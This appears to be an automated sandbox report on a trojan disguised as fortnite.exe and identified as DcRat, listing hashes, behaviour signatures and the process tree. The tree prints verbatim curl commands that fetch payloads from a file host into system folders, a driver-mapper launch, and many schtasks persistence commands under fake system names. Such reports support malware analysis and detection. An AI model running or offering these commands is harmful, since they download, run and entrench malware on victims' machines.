Analysis
-
max time kernel
55s -
max time network
58s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
17-11-2024 19:28
Static task
static1
Behavioral task
behavioral1
Sample
fortnite.exe
Resource
win10v2004-20241007-en
General
-
Target
fortnite.exe
-
Size
1.2MB
-
MD5
4ce2034a29fa1119013b35414ac146c8
-
SHA1
1bc3b7ff47f254f3058f8030e7081d48e762b1fc
-
SHA256
01d4438ab4eb34157102cef468aeafe178500b30a557efb0a14bcf117e7eeb8f
-
SHA512
9ff48316eff7b1cf2317ce9c363b596a42100c0f2ff3c17f06c3efe8f3f4b8de93072f594c4dfc7f7cdbf9b4c768643448141ca78bab4db28122f88d3ad64e27
-
SSDEEP
24576:zMbpm9Z/zQfnkuGKF7rlpC+bKlAtc06Du:PrQnIGz
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1020 1924 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1816 1924 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4892 1924 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3316 1924 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2372 1924 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 404 1924 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1920 1924 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2952 1924 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1840 1924 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3360 1924 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2720 1924 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2812 1924 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3828 1924 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 872 1924 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2136 1924 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4124 1924 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3128 1924 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2344 1924 schtasks.exe 98 -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation fortnite.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation physmeme.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation Medal.exe -
Executes dropped EXE 4 IoCs
pid Process 4124 physmeme.exe 3032 Medal.exe 4836 fortnite.exe 2096 mapper.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\System32\Tasks\driver.sys curl.exe File created C:\Windows\System32\Tasks\mapper.exe curl.exe -
Drops file in Program Files directory 6 IoCs
description ioc Process File created C:\Program Files\Java\jdk-1.8\886983d96e3d3e Medal.exe File created C:\Program Files (x86)\Common Files\Java\Java Update\fortnite.exe Medal.exe File created C:\Program Files (x86)\Common Files\Java\Java Update\d82279275be6a9 Medal.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\MoUsoCoreWorker.exe Medal.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\1f93f77a7f4778 Medal.exe File created C:\Program Files\Java\jdk-1.8\csrss.exe Medal.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Microsoft.NET\Framework64\3082\smss.exe Medal.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\3082\smss.exe Medal.exe File created C:\Windows\Microsoft.NET\Framework64\3082\69ddcba757bf72 Medal.exe File created C:\Windows\Speech\physmeme.exe curl.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language physmeme.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings physmeme.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings Medal.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1816 schtasks.exe 3316 schtasks.exe 1920 schtasks.exe 2952 schtasks.exe 2812 schtasks.exe 872 schtasks.exe 4124 schtasks.exe 3128 schtasks.exe 1020 schtasks.exe 4892 schtasks.exe 3360 schtasks.exe 2720 schtasks.exe 3828 schtasks.exe 2136 schtasks.exe 2372 schtasks.exe 404 schtasks.exe 1840 schtasks.exe 2344 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe 3032 Medal.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1408 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 1408 taskmgr.exe Token: SeSystemProfilePrivilege 1408 taskmgr.exe Token: SeCreateGlobalPrivilege 1408 taskmgr.exe Token: SeDebugPrivilege 3032 Medal.exe Token: SeDebugPrivilege 4836 fortnite.exe Token: 33 1408 taskmgr.exe Token: SeIncBasePriorityPrivilege 1408 taskmgr.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe 1408 taskmgr.exe -
Suspicious use of WriteProcessMemory 37 IoCs
description pid Process procid_target PID 1516 wrote to memory of 1780 1516 fortnite.exe 84 PID 1516 wrote to memory of 1780 1516 fortnite.exe 84 PID 1516 wrote to memory of 776 1516 fortnite.exe 85 PID 1516 wrote to memory of 776 1516 fortnite.exe 85 PID 776 wrote to memory of 3788 776 cmd.exe 86 PID 776 wrote to memory of 3788 776 cmd.exe 86 PID 1516 wrote to memory of 4124 1516 fortnite.exe 94 PID 1516 wrote to memory of 4124 1516 fortnite.exe 94 PID 1516 wrote to memory of 4124 1516 fortnite.exe 94 PID 4124 wrote to memory of 3416 4124 physmeme.exe 99 PID 4124 wrote to memory of 3416 4124 physmeme.exe 99 PID 4124 wrote to memory of 3416 4124 physmeme.exe 99 PID 3416 wrote to memory of 1744 3416 WScript.exe 107 PID 3416 wrote to memory of 1744 3416 WScript.exe 107 PID 3416 wrote to memory of 1744 3416 WScript.exe 107 PID 1744 wrote to memory of 3032 1744 cmd.exe 109 PID 1744 wrote to memory of 3032 1744 cmd.exe 109 PID 3032 wrote to memory of 3168 3032 Medal.exe 128 PID 3032 wrote to memory of 3168 3032 Medal.exe 128 PID 3168 wrote to memory of 4520 3168 cmd.exe 130 PID 3168 wrote to memory of 4520 3168 cmd.exe 130 PID 3168 wrote to memory of 3672 3168 cmd.exe 131 PID 3168 wrote to memory of 3672 3168 cmd.exe 131 PID 3168 wrote to memory of 4836 3168 cmd.exe 135 PID 3168 wrote to memory of 4836 3168 cmd.exe 135 PID 1516 wrote to memory of 4676 1516 fortnite.exe 138 PID 1516 wrote to memory of 4676 1516 fortnite.exe 138 PID 4676 wrote to memory of 1756 4676 cmd.exe 139 PID 4676 wrote to memory of 1756 4676 cmd.exe 139 PID 1516 wrote to memory of 5080 1516 fortnite.exe 141 PID 1516 wrote to memory of 5080 1516 fortnite.exe 141 PID 5080 wrote to memory of 3976 5080 cmd.exe 142 PID 5080 wrote to memory of 3976 5080 cmd.exe 142 PID 1516 wrote to memory of 1560 1516 fortnite.exe 144 PID 1516 wrote to memory of 1560 1516 fortnite.exe 144 PID 1560 wrote to memory of 2096 1560 cmd.exe 145 PID 1560 wrote to memory of 2096 1560 cmd.exe 145 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\fortnite.exe"C:\Users\Admin\AppData\Local\Temp\fortnite.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:1780
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/t3twl8.bin --output C:\Windows\Speech\physmeme.exe2⤵
- Suspicious use of WriteProcessMemory
PID:776 -
C:\Windows\system32\curl.execurl --silent https://files.catbox.moe/t3twl8.bin --output C:\Windows\Speech\physmeme.exe3⤵
- Drops file in Windows directory
PID:3788
-
-
-
C:\Windows\Speech\physmeme.exe"C:\Windows\Speech\physmeme.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4124 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Medal\LziQ5Qlyzu0f0C5NtfHJq0w.vbe"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3416 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Medal\Fua65ZRdZNJ5OJAqSXb7513NtPonCq4dK3Ubpg1B.bat" "4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Medal\Medal.exe"C:\Medal/Medal.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\pjGtyYN45Q.bat"6⤵
- Suspicious use of WriteProcessMemory
PID:3168 -
C:\Windows\system32\chcp.comchcp 650017⤵PID:4520
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:27⤵PID:3672
-
-
C:\Program Files (x86)\Common Files\Java\Java Update\fortnite.exe"C:\Program Files (x86)\Common Files\Java\Java Update\fortnite.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4836
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/5yimk7.sys --output C:\Windows\System32\Tasks\driver.sys >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
PID:4676 -
C:\Windows\system32\curl.execurl --silent https://files.catbox.moe/5yimk7.sys --output C:\Windows\System32\Tasks\driver.sys3⤵
- Drops file in System32 directory
PID:1756
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/wvsaqx.bin --output C:\Windows\System32\Tasks\mapper.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
PID:5080 -
C:\Windows\system32\curl.execurl --silent https://files.catbox.moe/wvsaqx.bin --output C:\Windows\System32\Tasks\mapper.exe3⤵
- Drops file in System32 directory
PID:3976
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\mapper.exe C:\Windows\System32\Tasks\driver.sys2⤵
- Suspicious use of WriteProcessMemory
PID:1560 -
C:\Windows\System32\Tasks\mapper.exeC:\Windows\System32\Tasks\mapper.exe C:\Windows\System32\Tasks\driver.sys3⤵
- Executes dropped EXE
PID:2096
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1408
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Program Files\Java\jdk-1.8\csrss.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1020
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Java\jdk-1.8\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1816
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Program Files\Java\jdk-1.8\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4892
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 13 /tr "'C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\MoUsoCoreWorker.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3316
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MoUsoCoreWorker" /sc ONLOGON /tr "'C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\MoUsoCoreWorker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2372
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 8 /tr "'C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\MoUsoCoreWorker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:404
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fortnitef" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Common Files\Java\Java Update\fortnite.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1920
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fortnite" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Java\Java Update\fortnite.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2952
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fortnitef" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Common Files\Java\Java Update\fortnite.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1840
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 12 /tr "'C:\Medal\explorer.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3360
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Medal\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2720
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\Medal\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2812
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\Windows\Microsoft.NET\Framework64\3082\smss.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3828
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\Microsoft.NET\Framework64\3082\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:872
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 8 /tr "'C:\Windows\Microsoft.NET\Framework64\3082\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2136
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MedalM" /sc MINUTE /mo 9 /tr "'C:\Medal\Medal.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4124
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Medal" /sc ONLOGON /tr "'C:\Medal\Medal.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3128
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MedalM" /sc MINUTE /mo 11 /tr "'C:\Medal\Medal.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2344
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
63B
MD5e24619181276af563705f4b1bed29490
SHA1fddac27290319f69543f5330fe97c122a8a01376
SHA256eee937e02edcd36de3ed7658c9ad9d79844502c8553a7c244b2b154aa9ffec05
SHA5121898a5e2a52f2f34466dfd9e1b1149b36052874b6be432dd9301ecfa6bc3a964dca6980b8db54ddcf8ef24a95792efcaffeb09aceb7a04304a0d18f4d0ce0591
-
Filesize
224B
MD596d43070e1e39d421c53a2f8dca13fc6
SHA107417cccceddbf8d5f5b48dec0b2e08d53a4754f
SHA2560dab986e5c533631946e27cdbb5147e68b9eb3008c1add60d21a59cd7d964314
SHA5129fc0ee5ac42bca7c7ee7584baa5be6907fc750378d037d56e075a21c4fe8eaeb3efac3e9fb6087a70a6ad01dcebf05d2462f2463daa8063b4047c11e5364d398
-
Filesize
1.8MB
MD54f66bbfed3a524398bd0267ed974ccbc
SHA1b2567397dc823412d87a23428c7833ff74586b7d
SHA256fa05b7f28eb1df0447998b89a08aa96453b0f3240c31489900d178862eaa80d8
SHA512bc4de61adb5f56c66043a2617ebfcc9f4e82d36e48dbdc9178695f9466d554eb364d69829490ff43100e8cb457ce7e78b2e277a3cf1733edf32c0154e6f56d9f
-
Filesize
241B
MD5455f6185faee0c13507a0fbeeaef3a65
SHA1ba16cd19a44fbc19b4f7ac69ed330c774857c907
SHA256a1e6c1ef5204d5b2c576c9f85f848aa44862735e670c0719ecc3e6084943121a
SHA5126be0ac00324aea63e26bb722642937d5e493ee7a9b14f53a57fba2a933d73c8941b68b11f9aa3673fe6350efd6967a5e0caa0dd6615a37586851e965b49309a5
-
Filesize
2.1MB
MD5f4620c0afa8e21897509b2e7215097f5
SHA1af216ca6105e271a3fb45a23c10ee7cf3158b7e1
SHA2568daf7dcdf256d7de40d33e5550dc5e8bbf887b8c4b7f49c79a15c96dad867f82
SHA51268b875acc06d9c3796f49377b5b25a5e8b9a380221eea59e4274249ca7d2bff10c3fc5edf50eae5da726afea882e0e777af86af25be7b57c8fbfd70448d8d7dd
-
Filesize
12KB
MD510a7579c03da9baac0f2efc69673d8c2
SHA1acd27171757c05216665a332450f0604b33b07d5
SHA256797c199601f2dcee255c24da2507ba435f03dcee0fdadbe348023aa75ebb2ad3
SHA512a9cb4c7765e34bb3d8dc1356e37dfeca72e713731c036a3eb48bf69daac6c1f45910409e24ec01e1b13cd9d5d0cad708f1483cd83dcec00566cb307652fe7233
-
Filesize
530KB
MD554ed683eba9340abf6783bd8d7b39445
SHA1950e3c11c71354097c8440529b31f8ac2b3c32a8
SHA2562d0a9d5ca563ffa82a974903bb43411b22c863311ec926449f08d16f483e4e70
SHA5129ff8c110823bad1e0a79a810b151e1d5557022080af0c8aaa9ff76996bd040747346f62459c50468cf86f49389c0e5fb7f057e9bd30fa31fed49ae5692d50ae2